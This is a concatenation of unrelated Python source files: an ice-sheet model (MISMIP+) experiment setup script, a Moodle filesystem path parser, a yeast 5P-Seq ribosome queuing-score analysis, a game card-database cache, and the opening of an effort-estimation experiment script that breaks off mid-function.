# The namelist and streams files for each experiment should already # have been created in the directory from which this script is launched; # the script simply moves them to the subdirectories. import sys, os import shutil # Parse options from optparse import OptionParser parser = OptionParser() parser.add_option("-x", "--expt", dest="experiment", type='string', help="MISMIP+ experiment(s) to set up", metavar="EXPT") options, args = parser.parse_args() if options.experiment: if options.experiment == 'all': # Set up subdirectories for all experiments experiments = ['Spinup', 'Ice0', 'Ice1r', 'Ice1ra', 'Ice1rr', 'Ice1rax', 'Ice1rrx', 'Ice2r', 'Ice2ra', 'Ice2rr', 'Ice2rax', 'Ice2rrx'] else: experiments = [options.experiment] else: sys.exit('Error: No experiment specified. Please specify experiment(s) with the -x option') print 'Experiments:', experiments # Loop through experiments for expt in experiments: print 'Setting up directory for experiment', expt # Make the subdirectory if it does not exist already try: os.mkdir(expt) except: pass # Go to the subdirectory try: os.chdir(expt) except: sys.exit('Error, could not change to subdirectory') # Move the appropriate namelist and stream files from the parent directory. # Note: In the subdirectory, the expt prefix (e.g., 'Ice0') is not included. # So there is no need for the -n and -s specifiers when launching a run. namelistFile = '../namelist.landice.' + expt shutil.move(namelistFile, './namelist.landice') streamsFile = '../streams.landice.' + expt shutil.move(streamsFile, './streams.landice') # Link to the executable in the parent directory executableName = 'landice_model' os.symlink('../landice_model', 'landice_model') # Link to any and all graph partition files in the parent directory # Note: If a new file is needed, it can be created using metis. # For example to run on 128 cores on LANL IC: # > module load metis # > gpmetis graph.info 128 # This creates a file called graph.info.part.128 for file in os.listdir('..'): if file.startswith('graph.info.part'): os.symlink('../' + file, file) # Link to the albany input file in the parent directory os.symlink('../' + 'albany_input.xml', 'albany_input.xml') # Link to the appropriate restart file and timestamp # No restart file needed for the Spinup experiment # Note: The symlinks will initially be empty (except for landice_grid.nc). # Ice0, Ice1r and Ice2r must follow the Spinup. # Ice1ra and Ice1rr must follow Ice1r; Ice2ra and Ice2rr must follow Ice2r. # Ice1rax must follow Ice1ra, and similiary for the other Ice*x. 
if expt == 'Spinup': # Start from landice_grid.nc gridfile = 'landice_grid.nc' griddir = '../' os.symlink(griddir + gridfile, gridfile) elif expt =='Ice0' or expt=='Ice1r' or expt=='Ice2r': # Start from restart file at the end of Spinup, but call it landice_grid.nc, # so the run is treated as a cold start # Note: This requires a one-line NCO command to rename the Spinup restart file # while removing the xtime variable gridfile = 'landice_grid.nc' griddir = '../Spinup/' os.symlink(griddir + gridfile, gridfile) else: # Start from the appropriate restart file if expt=='Ice1ra' or expt=='Ice1rr': restartYear = 100 restartdir = '../Ice1r/' elif expt=='Ice1rax': restartYear = 200 restartdir = '../Ice1ra/' elif expt=='Ice1rrx': restartYear = 200 restartdir = '../Ice1rr/' elif expt=='Ice2ra' or expt=='Ice2rr': restartYear = 100 restartdir = '../Ice2r/' elif expt=='Ice2rax': restartYear = 200 restartdir = '../Ice2ra/' elif expt=='Ice2rrx': restartYear = 200 restartdir = '../Ice2rr/' # Link to the restart file restartfile = 'restart_00' + str(restartYear) + '.nc' os.symlink(restartdir + restartfile, restartfile) # Create the restart_timestamp file # Not using symbolic links because these allow files to be rewritten # from other directories timestampFile = open('restart_timestamp', 'w') restartTimestamp = ' ' + str(restartYear) + '-01-01_00:00:00' timestampFile.write(restartTimestamp + '\n') timestampFile.close() # Go back to the main directory and continue os.chdir('..') <reponame>ryansingman/todo-sql from .parser import parse_command<reponame>BroganD1993/MoodleFUSE<filename>moodlefuse/filesystem/path_parser.py #!/usr/bin/env python # encoding: utf-8 """Class to parse a filesystem path """ from moodlefuse.core import config class PathParser(object): @staticmethod def is_in_root(location): return len(location) is 0 @staticmethod def is_in_course(location): return len(location) is 1 @staticmethod def is_in_course_categorie(location): return len(location) is 2 @staticmethod def is_file(location): return len(location) is 3 @staticmethod def is_assignment(location): return len(location) is 4 @staticmethod def is_assignment_submission(location): return len(location) is 5 @staticmethod def get_position_in_filesystem_as_array(path): path = path.replace(config['LOCAL_MOODLE_FOLDER'] + '/', '') if len(path) is 0: return [] path_sections = path.split("/") return path_sections <gh_stars>0 #!/usr/bin/env python # # works fine # Features to add: # a) split by stop codon and # # Computing Queing score is changed. # assumes 5P-Seq uncorrected 5' positions what is mapped to A-Site with offset 17 # Peaks positions 1 -18:-16 *1 (mono-somes STOP codon) # 2 -48:-46 *2 (di-somes) # 3 -78:-76 *3 (tri-somes) # 4 -108:-106 *4 (tetra-somes) . # ver. 0.1.6 # divide with avarage codon coverage and sum() = QS # # bkg region can be selected between peaks (-bkg 2) or before tetrasome peak area (-bkg 1 (default) ) # ver. 0.1.7 # # -w weigthing tetra-,tri-, and disomes YES/NO default NO # ver. 
0.1.8 __author__ = "<NAME>" __copyright__ = "Copyright 2020" __version__ = "0.1.8" __email__ = "<EMAIL>" __status__ = "beta" import sys import argparse import pandas as pd import pysam parser = argparse.ArgumentParser(description='Computes ribosomes queing score at stop') parser.add_argument('-i', type=str, help='input table of gene coverage in *.hd5 format') parser.add_argument('-o', type=str, help='output file name *.csv') parser.add_argument('-annot', type=str, help='GTF annotation file', default='0-References/genome.gtf.gz') parser.add_argument('-th1', type=float, help='Summary gene coverage 150 nt before stop - 10(rpm) default', default=15) parser.add_argument('-th2', type=float, help='Background coverage - codon mean from -115 up to Span', default=0.15) parser.add_argument('-span', type=int, help='Positions before - stop recommended 150 or bigger', default=150) parser.add_argument('-bkg', type=int, help='region for bakground con be 1 or 2: 1 - before and 2 - between peaks', default=2) parser.add_argument('-col', type=str, help='column for values: "sum"; "rpm"; "counts"', default='rpm') parser.add_argument('-w', type=str, help='Weigthing tetra-,tri-, and di-somes: YES/NO/BOTH', default="NO") args = parser.parse_args() message = "between peaks" if args.bkg==2 else "{} to {}".format(-args.span, -115) print("\n\ -i input *.h5: {}\n\ -o output *.csv: {}\n\ -annot annotation GTF: {}\n\ -col column: {}\n\ -th1 region threshold: {}\n\ -th2 bkg threshold: {}\n\ -bkg bkg region is: {}\n\ -w weigthing peaks: {}\n\ -span nt before stop: {}\n".format(args.i, args.o, args.annot, args.col, args.th1, args.th2, message, args.w, args.span)) usage = "./compute_queuing_5PSeq.py -i *.hdf -o *.csv" if (args.i==None)|(args.o==None): sys.exit("\n usage:\n\t{}\n".format(usage)) infile_h5 = args.i outfile = args.o thres_cover= args.th1 thres_bkg = args.th2 Span = args.span annotation = args.annot col = args.col bkg_region = args.bkg weighted = str.upper(args.w) ## check is there enough space for background if (Span<109) & (bkg_region==2): report = "Increase -ppan at least up to 108. Current value is {} ".format(Span) sys.exit("\n {} \n".format(report)) # Span - 115 must be bigger than 9 nt if ((Span-115)<9) & (bkg_region==1): report = "{}nt is too little for backgrouns. Increase Span at least up to 124".format(Span-115) sys.exit("\n {} \n".format(report)) replacestr = "_th{}-{}_v4.csv".format(thres_cover, thres_bkg) outfile = outfile.replace('.csv', replacestr) ############################ def df_framing(df1, index, columns, strand="+"): # create df2 df2 = pd.DataFrame(0, index=index, columns=columns) df1 = df1.add(df2, fill_value=0, axis=1) if strand == "+": df1.reset_index(inplace=True) # reset index return df1[columns] elif strand == "-": df1 = df1[::-1] # reverts table df1.reset_index(inplace=True) # reset index return df1[columns] else: # error print("ERROR! 
Expext '+'/'-' but found {} for strand".format(strand)) def get_part_from_gtf(annotation, reference=None, feature="CDS"): tabixfile = pysam.TabixFile(annotation, parser=pysam.asGTF()) return [gtf for gtf in tabixfile.fetch(reference=reference) if (gtf.feature == feature)] def yeastChr(): # Ordered yeast Chr list short names from ensembl return ['I','II','III','IV','V','VI','VII','VIII','IX','X','XI','XII','XIII','XIV','XV', 'XVI','Mito'] chr_length_d = { 'I':230218, 'II':813184, 'III':316620, 'IV':1531933, 'IX':439888, 'Mito':85779, 'V':576874, 'VI':270161, 'VII':1090940, 'VIII':562643, 'X':745751, 'XI':666816, 'XII':1078177, 'XIII':924431, 'XIV':784333, 'XV':1091291, 'XVI':948066 } def df_2_ContiniousSeries(df, index, column="rpm"): """ returns pd.Series with 0 values for all positions in a range of index. Input df is condensed, i. e. positions with values < 0 not included :param df: condensed df, i. e. don't contain rows with 0 in index :param index: range of genome positions :param column: column name to extract from df - default is 'sum' :return: Series """ s1 = pd.Series(0, index=index) s2 = df[column] s3 = s1+s2 return s3.fillna(0) def reindex(s, name, index): """ Returns reindexed Series """ s.name = name df = s.reset_index() df['rel_Pos'] = index return df.set_index('rel_Pos')[name] #returns pd.Series ############################# c=c1=c2=c3=0# counting d = {} # dictionary for collecting data # input h5 hd5 = pd.HDFStore(infile_h5, "r") # metagene summary df columns = hd5[hd5.keys()[0]].columns for ref in yeastChr(): #sys.stderr.write("{} \n".format(DEBUG! 2)) sys.stderr.write("{:4} ...\n".format(ref)) df_f = hd5['For_rpm/'+ ref] df_r = hd5['Rev_rpm/'+ ref] ### df 2 continious Serise index = list(range(0, chr_length_d[ref] + 1)) s_f = df_2_ContiniousSeries(df_f, index, column=col) s_r = df_2_ContiniousSeries(df_r, index, column=col) stop_gtf_l = get_part_from_gtf(annotation, reference=ref, feature="stop_codon") # gtf part for stop for gtf in stop_gtf_l: #stop_codon = genome[ref][gtf.start:gtf.start+3] # get stop codon #stop_codon = stop_codon if gtf.strand=='+' else revcompl(stop_codon) # revcomp rev_strand #test coverage coverage_for = s_f.loc[gtf.start - Span:gtf.start + 3].sum() coverage_rev = s_r.loc[gtf.start:gtf.start + Span - 1].sum() coverage_rpm = coverage_for if gtf.strand == '+' else coverage_rev if coverage_rpm < thres_cover: #FILTER 1 c1+=1 continue s_1 = s_f.loc[gtf.start - Span:gtf.start + Span] # Forvard s_2 = s_r.loc[gtf.end - Span - 1:gtf.end + Span - 1] # Reverse # proper index & dataframe s = s_1 if gtf.strand == '+' else s_2[::-1] index = list(range(-Span, Span + 1)) s = reindex(s, name=str(col), index=index) # get regions # codon wise if bkg_region == 1: bkg = s.loc[-Span:-115].mean()*3 # 5PSeq & Series elif bkg_region == 2: bkg = (s.loc[-43:-21].mean()*3 + s.loc[-73:-51].mean()*3 + s.loc[-103:-81].mean()*3)/3 # to get mean value for codon else: sys.exit("-bkg can be 1 or 2 but is {}".format(args.bkg)) if bkg <= thres_bkg: #FILTER 2 continue # -17,-47,-77,-107 peak_stop = s.loc[-18 : -16].sum() # codon coverage at STOP peak_30 = s.loc[-48 : -46].sum() # 30 nt before peak_60 = s.loc[-78 : -76].sum() # 60 nt before peak_90 = s.loc[-108:-106].sum() # 90 nt before # ratios - ivide codon coverage by avarage codon coverage (rpm/rpm) - unitless qs_stop = peak_stop/bkg qs_30 = (peak_30/bkg) qs_60 = (peak_60/bkg) qs_90 = (peak_90/bkg) ########## # collect data c2+=1 d[gtf.gene_id] = [bkg, qs_stop, qs_30, qs_60, qs_90] print("{:8,} passed region threshold 
{}".format(c2,args.th1)) # pmake dataframe index = ["bkg", "qs_stop", "qs_30", "qs_60", "qs_90"] df = pd.DataFrame(d, index=index).T # queuingScore-Weigthed df['QS_weighted'] = df["qs_stop"] + df["qs_30"]*2 + df["qs_60"]*3 + df["qs_90"]*4 # queuingScore df['QS'] = df["qs_stop"] + df["qs_30"] + df["qs_60"] + df["qs_90"] if weighted == "NO": df.drop(labels="QS_weighted", axis=1, inplace=True) elif weighted == "YES": df.drop(labels="QS", axis=1, inplace=True) elif weighted == "BOTH": pass else: print("Warnings! parameter -w {} not recognised!".format(weighted)) i = 1 # minimal queing score to keep in table j = 50 # strong queing score worth to check mask1 = df['QS']>i mask2 = df['QS']>j df = df.loc[mask1,:] print("There are {} genes with 'QueuingScore (QS)' bigger than {}".format(df.shape[0], i)) print("There are {} most wavier genes {} times above bakground".format(df.loc[mask2,:].shape[0], j)) df.to_csv(outfile, sep='\t', header=True, index=True) print("Output:\n {}".format(outfile)) print("//") hd5.close() <gh_stars>10-100 import re import sqlite3 import pickle import os import subprocess import sys from time import time from datetime import datetime, timedelta from pytz import timezone, utc from functools import lru_cache, partial from collections import defaultdict, namedtuple, Counter from tornado import ioloop from csvloader import clean_value, load_keyed_db_file, load_db_file from . import en from . import apiclient from . import acquisition from . import extra_va_tables from . import update ark_data_path = partial(os.path.join, "_data", "ark") private_data_path = partial(os.path.join, "_data", "private") story_data_path = partial(os.path.join, "_data", "stories") transient_data_path = partial(os.path.join, os.getenv(os.getenv("TRANSIENT_DIR_POINTER", ""), "_data/transient")) _JST = timezone("Asia/Tokyo") def JST(date, to_utc=1): # this is here because some datetime calls were throwing on 29 Feb. # TODO in 4 years, check if this is still needed try: time = _JST.localize(datetime.strptime(date.replace("-02-29 ", "-03-01 "), "%Y-%m-%d %H:%M:%S")) except ValueError: # and this is here because the date format changed starting 10021500 time = _JST.localize(datetime.strptime(date.replace("/02/29 ", "/03/01 "), "%Y/%m/%d %H:%M:%S")) if to_utc: return time.astimezone(utc) else: return time def TODAY(): return utc.localize(datetime.utcnow()) def _real_scale_skill_value(max_, min_, lv): return (min_ + ((max_ - min_) / 9) * lv) / 100.0 def _scale_skill_value(max_, min_, lv): val = _real_scale_skill_value(max_, min_, lv) # if the decimal part is too small, just remove it if val - int(val) < 0.01: return int(val) else: return val def skill_chance(prob_def, ptype): maxv, minv = prob_def[ptype].probability_max, prob_def[ptype].probability_min return "{0}..{1}".format(_scale_skill_value(maxv, minv, 0), _scale_skill_value(maxv, minv, 9)) def skill_dur(dur_def, ttype): maxv, minv = dur_def[ttype].available_time_max, dur_def[ttype].available_time_min return "{0}..{1}".format(_scale_skill_value(maxv, minv, 0), _scale_skill_value(maxv, minv, 9)) def determine_best_stat(vo, vi, da): """Card stats are either balanced (VoViDa are around the same), or one stat will be noticeably higher. 
This function returns which one.""" VISUAL, DANCE, VOCAL, BALANCED = 1, 2, 3, 4 # for balanced cards, the ratio hi:lo will be close to 1 THRES = 1.2 stats = ((vo, VOCAL), (vi, VISUAL), (da, DANCE)) lo, lo_typ = min(stats) hi, hi_typ = max(stats) if hi / lo > THRES: return hi_typ else: return BALANCED + hi_typ def paginate_id_list(idl, pagesize=500): start = 0 step = pagesize while 1: page = idl[start:start + step] if not page: break yield page start += step Availability = namedtuple("Availability", ("type", "name", "start", "end")) Availability._TYPE_GACHA = 1 Availability._TYPE_EVENT = 2 gacha_rates_t = namedtuple("gacha_rates_t", ("r", "sr", "ssr")) # to be safe: define as exprs of int so the resulting floats will compare properly. # otherwise there may be a subtle difference between "8850/100" and "88.5" # and == will break. gacha_rates_t._REGULAR_RATES = gacha_rates_t(8500 / 100, 1200 / 100, 300 / 100) gacha_single_reward_t = namedtuple("gacha_single_reward_t", ("card_id", "is_limited", "sort_order", "relative_odds", "gsr_relative_odds")) potential_birthday_t = namedtuple("potential_birthday_t", ("month", "day", "chara")) TITLE_ONLY_REGEX = r"^[(.+)]" NAME_ONLY_REGEX = r"^(?:[.+])?(.+)$" AWAKENED_SYMBOL = "+" class DataCache(object): def __init__(self, version): self.version = version self.load_date = datetime.utcnow() self.hnd = sqlite3.connect(transient_data_path("{0}.mdb".format(version))) self.class_cache = {} self.prime_caches() self.reset_statistics() self.live_cache = { "gacha": {} } def reset_statistics(self): self.vc_this = 0 self.primed_this = Counter() @lru_cache(1) def gacha_ids(self): gachas = [] gacha_stub_t = namedtuple("gacha_stub_t", ("id", "name", "start_date", "end_date", "type", "subtype", "rates")) stub_query = """SELECT gacha_data.id, gacha_data.name, start_date, end_date, type, type_detail, gacha_rate.rare_ratio, gacha_rate.sr_ratio, gacha_rate.ssr_ratio FROM gacha_data LEFT JOIN gacha_rate USING (id) WHERE type = 3 AND type_detail = 1""" for id, n, ss, es, t, t2, r, sr, ssr in self.hnd.execute(stub_query): ss, es = JST(ss), JST(es) gachas.append(gacha_stub_t(id, n, ss, es, t, t2, gacha_rates_t(r / 100, sr / 100, ssr / 100))) self.primed_this["sel_gacha"] += 1 return sorted(gachas, key=lambda x: x.start_date) @lru_cache(1) def event_ids(self): events = [] event_stub_t = namedtuple("event_stub_t", ("id", "name", "start_date", "end_date")) for id, na, ss, es in self.hnd.execute("SELECT id, name, event_start, event_end FROM event_data"): ss, es = JST(ss), JST(es) events.append(event_stub_t(id, na, ss, es)) self.primed_this["sel_event"] += 1 return sorted(events, key=lambda x: x.start_date) def gachas(self, when): select = [] for stub in reversed(self.gacha_ids()): if stub.start_date <= when < stub.end_date: select.append(stub) return select def available_cards(self, gacha): has_legacy_available_data, = self.hnd.execute("SELECT count(0) FROM gacha_available WHERE gacha_id = ?", (gacha.id,)).fetchone() if has_legacy_available_data: query = "SELECT reward_id, limited_flag, (CASE WHEN recommend_order == 0 THEN 9999 ELSE recommend_order END), relative_odds, relative_sr_odds FROM gacha_available WHERE gacha_id = ?" else: # Note: gacha_available_2 only lists featured cards. query = "SELECT card_id, limited_flag, recommend_order, 0, 0 FROM gacha_available_2 WHERE gacha_id = ? 
ORDER BY recommend_order" cur_1 = self.hnd.execute(query, (gacha.id,)) self.primed_this["sel_ac"] += 1 return [gacha_single_reward_t(*r) for r in cur_1] def limited_availability_cards(self, gachas): select = [gacha.id for gacha in gachas] tmp = defaultdict(lambda: []) lastlen = 0 for page in paginate_id_list(select): self.primed_this["sel_la"] += 1 if lastlen != len(page): query = "SELECT gacha_id, reward_id FROM gacha_available WHERE limited_flag == 1 AND gacha_id IN ({0})".format(",".join("?" * len(select))) query_2 = "SELECT gacha_id, card_id FROM gacha_available_2 WHERE limited_flag == 1 AND gacha_id IN ({0})".format(",".join("?" * len(select))) for gid, reward in self.hnd.execute(query, page): if reward in self.fix_limited: # XXX we only support negative fixes for now continue tmp[gid].append(reward) try: q2_iterator = self.hnd.execute(query_2, page) except sqlite3.OperationalError: continue for gid, reward in q2_iterator: if reward not in self.fix_limited and reward not in tmp[gid]: tmp[gid].append(reward) return [tmp[gacha.id] for gacha in gachas] def current_limited_availability(self): return self.limited_availability(TODAY()) def events(self, when): select = [] for stub in reversed(self.event_ids()): if stub.start_date <= when < stub.end_date: select.append(stub) return select def current_events(self): return self.events(TODAY()) def load_names(self): overrides = load_keyed_db_file(private_data_path("overrides.csv")) names = load_keyed_db_file(transient_data_path("names.csv")) if not names: # then we can't get a schema names.update(overrides) return names schema = next(iter(names.values())).__class__ names_keys = set(schema._fields) overrides_keys = set(schema._fields) if not overrides_keys <= names_keys: raise Exception('names.csv schema error: all of "chara_id","kanji","kanji_spaced","kana_spaced","conventional" must be present in the header') # maps kanji -> chara id by_kanji = {v.kanji: k for k, v in names.items()} for key in overrides: if key < 0: # a negative chara id in the override entry means we should match on kanji. real_key = by_kanji.get(overrides[key].kanji) intermediate = names.get(real_key) else: real_key = key intermediate = names.get(key) if intermediate is None: continue d = intermediate._asdict() override_vals = overrides[key]._asdict() # chara_id may differ if we indexed on kanji, so remove it del override_vals["chara_id"] d.update(override_vals) names[real_key] = schema(**d) # Filter out any special-purpose char entries. 
valid_char_ids = set(id for id, in self.hnd.execute("SELECT chara_id FROM chara_data WHERE base_card_id != 0")) names = {k: v for k, v in names.items() if k in valid_char_ids} return names def prime_caches(self): self.names = self.load_names() self.kanji_to_name = {v.kanji: v.conventional for v in self.names.values()} self.ea_overrides = list(load_db_file(private_data_path("event_availability_overrides.csv"))) self.fix_limited = load_keyed_db_file(private_data_path("gacha_availability_overrides.csv")) self.overridden_events = set(x.event_id for x in self.ea_overrides) prob_def = self.keyed_prime_from_table("probability_type") time_def = self.keyed_prime_from_table("available_time_type") self._skills = self.keyed_prime_from_table("skill_data", chance=lambda obj: partial(skill_chance, prob_def, obj.probability_type), dur=lambda obj: partial(skill_dur, time_def, obj.available_time_type), max_chance=lambda obj: prob_def[obj.probability_type].probability_max, max_duration=lambda obj: time_def[obj.available_time_type].available_time_max) self._lead_skills = self.keyed_prime_from_table("leader_skill_data") self.rarity_dep = self.keyed_prime_from_table("card_rarity") self.chain_id = {} self.id_chain = defaultdict(lambda: []) chain_cur = self.hnd.execute("SELECT id, series_id FROM card_data WHERE album_id > 0") for p in self.prime_from_cursor("chain_id_t", chain_cur): self.chain_id[p.id] = p.series_id self.id_chain[p.series_id].append(p.id) self.char_cache = {} self.card_cache = {} def prime_from_table(self, table, **kwargs): rows = self.hnd.execute("SELECT * FROM {0}".format(table)) class_name = table + "_t" return self.prime_from_cursor(class_name, rows, **kwargs) def prime_from_cursor(self, typename, cursor, **kwargs): the_raw_type, the_type = self.class_cache.get(typename, (None, None)) keys = list(kwargs.keys()) if not the_raw_type: fields = [x[0] for x in cursor.description] raw_field_len = len(fields) the_raw_type = namedtuple("_" + typename, fields) for key in keys: fields.append(key) the_type = namedtuple(typename, fields) self.class_cache[typename] = (the_raw_type, the_type) for val_list in cursor: temp_obj = the_raw_type(*map(clean_value, val_list)) try: extvalues = tuple(kwargs[key](temp_obj) for key in keys) except Exception: raise RuntimeError( "Uncaught exception while filling stage2 data for {0}. Are you missing data?".format(temp_obj)) yield the_type(*temp_obj + extvalues) def keyed_prime_from_table(self, table, **kwargs): ret = {} for t in self.prime_from_table(table, **kwargs): ret[t[0]] = t return ret def cache_chars(self, idl): lastlen = 0 for ids in paginate_id_list(list(set(idl))): if lastlen != len(ids): query = "SELECT * FROM chara_data WHERE base_card_id != 0 AND chara_id IN ({0})".format(",".join("?" 
* len(ids))) lastlen = len(ids) cur = self.hnd.execute(query, ids) for p in self.prime_from_cursor("chara_data_t", cur, kanji_spaced=lambda obj: self.names.get(obj.chara_id).kanji_spaced, kana_spaced=lambda obj: self.names.get(obj.chara_id).kana_spaced, conventional=lambda obj: self.names.get(obj.chara_id).conventional, valist=lambda obj: []): self.char_cache[p.chara_id] = p self.primed_this["prm_char"] += 1 self.primed_this["prm_char_calls"] += 1 cur.close() def cache_cards(self, idl): normalized_idl = set() for id in idl: a = self.chain_id.get(id) if a: normalized_idl.add(a) idl = list(normalized_idl) query_preload_chars = "SELECT chara_id, id FROM card_data INNER JOIN chara_data USING (chara_id) WHERE base_card_id > 0 AND evolution_id > 0" self.cache_chars([row[0] for row in self.hnd.execute(query_preload_chars) if row[1] in normalized_idl]) lastlen = 0 for page in paginate_id_list(idl): if lastlen != len(page): query = "SELECT * FROM card_data WHERE series_id IN ({0})".format(",".join("?" * len(page))) cur = self.hnd.execute(query, page) selected = self.prime_from_cursor("card_data_t", cur, chara=lambda obj: self.char_cache.get(obj.chara_id), has_spread=lambda obj: obj.rarity > 4, has_sign=lambda obj: obj.rarity == 7, name_only=lambda obj: re.match(NAME_ONLY_REGEX, obj.name).group(1), title=lambda obj: re.match(TITLE_ONLY_REGEX, obj.name).group(1) if obj.title_flag else None, skill=lambda obj: self._skills.get(obj.skill_id), lead_skill=lambda obj: self._lead_skills.get(obj.leader_skill_id), rarity_dep=lambda obj: self.rarity_dep.get(obj.rarity), overall_min=lambda obj: obj.vocal_min + obj.dance_min + obj.visual_min, overall_max=lambda obj: obj.vocal_max + obj.dance_max + obj.visual_max, overall_bonus=lambda obj: obj.bonus_vocal + obj.bonus_dance + obj.bonus_visual, valist=lambda obj: [], best_stat=lambda obj: determine_best_stat(obj.vocal_max, obj.visual_max, obj.dance_max)) for p in selected: self.card_cache[p.id] = p self.primed_this["prm_card"] += 1 self.primed_this["prm_card_calls"] += 1 def card(self, id): if id not in self.card_cache: self.cache_cards([id]) return self.card_cache.get(id) def cards(self, ids): needed = [c for c in ids if c not in self.card_cache] if needed: self.cache_cards(needed) return [self.card_cache.get(c) for c in ids] def cards_belonging_to_char(self, id): return self.all_chara_id_to_cards().get(id, []) @lru_cache(1) def all_chara_id_to_cards(self): ret = defaultdict(lambda: []) idl = self.hnd.execute("SELECT card_data.chara_id, card_data.id FROM card_data " "INNER JOIN chara_data USING (chara_id) WHERE evolution_id != 0 AND base_card_id != 0 " "ORDER BY card_data.chara_id") for cid, card in idl: ret[cid].append(card) return ret def chara(self, id): if id not in self.char_cache: self.cache_chars([id]) return self.char_cache.get(id) def charas(self, ids): needed = [c for c in ids if c not in self.char_cache] if needed: self.cache_chars(needed) return [self.char_cache.get(c) for c in ids] def chain(self, id): series_id = self.chain_id.get(id) if not series_id: return None return self.id_chain[series_id] def all_chain_ids(self): return sorted(self.id_chain.keys()) def skills(self, ids): return [self._skills.get(id) for id in ids] def lead_skills(self, ids): return [self._lead_skills.get(id) for id in ids] def va_data(self, id): va_list = self.hnd.execute("SELECT id, use_type, `index`, voice_flag, discription, 0 AS n1 FROM card_comments WHERE id = ?", (id,)) self.primed_this["sel_valist"] += 1 ret = list(self.prime_from_cursor("va_data_t", va_list)) if 
len(ret) == 0: return [] r_va_data_t, va_data_t = self.class_cache.get("va_data_t") if ret[0].voice_flag: if id in self.char_cache: yield from extra_va_tables.char_voices(va_data_t, id) else: yield from extra_va_tables.card_voices(va_data_t, id, self.chain_id[id]) yield from ret def svx_data(self, id): return self.prime_from_cursor("fp_data_t", self.hnd.execute("SELECT pose, position_x, position_y FROM chara_face_position WHERE chara_id = ?", (id,))) def translate_name(self, kanji): if kanji[-1] == AWAKENED_SYMBOL: return self.kanji_to_name.get(kanji[:-1], kanji[:-1]) + "+" else: return self.kanji_to_name.get(kanji, kanji) @lru_cache(1) def birthdays(self): return_value = defaultdict(lambda: []) for month, day, chara_id in self.hnd.execute("SELECT birth_month, birth_day, chara_id FROM chara_data WHERE birth_month + birth_day > 0 AND base_card_id != 0"): return_value[(month, day)].append(chara_id) self.primed_this["sel_birth"] += 1 return return_value def potential_birthdays(self, date): # the date changes depending on timezone. # we can't assume everyone is in UTC, so we'll # return every chara whose birthday is the day # of, the day before, or the day after the date # (UTC) specified in `date`. # If you use this method, you should filter # the returned values based on the actual date boundaries # of the user's timezone, i.e. clientside. yesterday = date.date() - timedelta(days=1) today = date.date() tomorrow = date.date() + timedelta(days=1) pool = [] for d in [yesterday, today, tomorrow]: char_ids_for_this_day = self.birthdays()[(d.month, d.day)] pool.extend(char_ids_for_this_day) return self.charas(pool) def fetch_motif_data(self, fortype): if fortype > 6 or fortype < 1: raise ValueError("Type doesn't exist currently") query = """SELECT motif_value, skill_motif_value.type_{0:02d}_value, skill_motif_value_grand.type_{0:02d}_value FROM skill_motif_value INNER JOIN skill_motif_value_grand USING (motif_value) GROUP BY skill_motif_value.type_{0:02d}_value, skill_motif_value_grand.type_{0:02d}_value ORDER BY motif_value""".format(fortype) return [(a[0], a[1] - 100, a[2] - 100) for a in self.hnd.execute(query)] def fetch_sparkle_data(self, fortype): if fortype > 6 or fortype < 1: raise ValueError("Type doesn't exist currently") query = """SELECT life_value, skill_life_value.type_{0:02d}_value, skill_life_value_grand.type_{0:02d}_value FROM skill_life_value INNER JOIN skill_life_value_grand USING (life_value) GROUP BY skill_life_value.type_{0:02d}_value, skill_life_value_grand.type_{0:02d}_value ORDER BY life_value""".format(fortype) return [(a[0], a[1] - 100, a[2] - 100) for a in self.hnd.execute(query)] async def live_gacha_rates(self, gacha_id): cached = self.live_cache["gacha"].get(gacha_id) if cached is not None: return cached if apiclient.is_usable(): http, api_data = await apiclient.gacha_rates(gacha_id) else: return None if not api_data: return None try: rate_dict = api_data[b"data"][b"gacha_rate"][b"charge"] individual_rate_dict = {} for k in {b"r", b"sr", b"ssr"}: cl = {X[b"card_id"]: float(X[b"charge_odds"]) for X in api_data[b"data"][b"idol_list"].get(k, [])} individual_rate_dict.update(cl) self.live_cache["gacha"][gacha_id] = { "rates": gacha_rates_t(float(rate_dict[b"r"]), float(rate_dict[b"sr"]), float(rate_dict[b"ssr"])), "indiv": individual_rate_dict, "gacha": gacha_id, } finally: return self.live_cache["gacha"].get(gacha_id) def __del__(self): self.hnd.close() def display_app_ver(): return os.environ.get("VC_APP_VER", "(unset)") data = None def hand_over_to_version(res_ver): 
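    """Replace the module-level DataCache with one built for the given resource version.

    The previous cache object is simply dropped; its __del__ closes the old sqlite handle.
    """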
global data data = DataCache(res_ver) def init(): global data available_mdbs = sorted((x for x in os.listdir(transient_data_path()) if x.endswith(".mdb")), reverse=1) try: explicit_vers = int(sys.argv[1]) except (ValueError, IndexError): if available_mdbs: explicit_vers = available_mdbs[0].split(".")[0] else: explicit_vers = 0 if explicit_vers and os.path.exists(transient_data_path("{0}.mdb".format(explicit_vers))): print("Loading mdb:", explicit_vers) data = DataCache(explicit_vers) apiclient.ApiClient.shared().res_ver = str(explicit_vers) else: print("No mdb, let's download one") loop = ioloop.IOLoop.current() if explicit_vers: bound = lambda: update.update_to_res_ver(explicit_vers) elif apiclient.is_usable(): print("We have enough secrets to do an automatic version check") bound = lambda: update.async_version_check(lambda: None) else: print("No data installed and we can't get it automatically. Crashing.") print("Hint: Try running this again with a version number.") print(" {0} 100xxxxx".format(sys.argv[0])) sys.exit(1) loop.run_sync(bound) from __future__ import print_function, division import sys import os sys.path.append(os.path.abspath(".")) sys.dont_write_bytecode = True # from datasets.albrecht import Albrecht # from datasets.china import China # from datasets.desharnais import Desharnais # from datasets.finnish import Finnish # from datasets.isbsg10 import ISBSG10 # from datasets.kemerer import Kemerer # from datasets.kitchenhamm import Kitchenhamm # from datasets.maxwell import Maxwell # from datasets.miyazaki import Miyazaki from datasets.cleaned.albrecht import Albrecht from datasets.cleaned.china import China from datasets.cleaned.desharnais import Desharnais from datasets.cleaned.finnish import Finnish from datasets.cleaned.isbsg10 import ISBSG10 from datasets.cleaned.kemerer import Kemerer from datasets.cleaned.kitchenhamm import Kitchenhamm from datasets.cleaned.maxwell import Maxwell from datasets.cleaned.miyazaki import Miyazaki from utils.lib import * from utils.validation import * from methods.peeking import peeking2 from methods.cart import cart from methods.teak import teak from methods.knn import knn_1, knn_3 from methods.cogee import cogee from methods.atlm import atlm from optimizer.teak_optimize import teak_optimize from utils.errors import * from utils import sk from joblib import Parallel, delayed from time import time datasets = [Albrecht, Desharnais, Finnish, Kemerer, Maxwell, Miyazaki, China, ISBSG10, Kitchenhamm] error = msae def mre_calc(y_predict, y_actual): mre = [] for predict, actual in zip(y_predict, y_actual): mre.append(abs(predict - actual) / (actual)) mmre = np.median(mre) if mmre 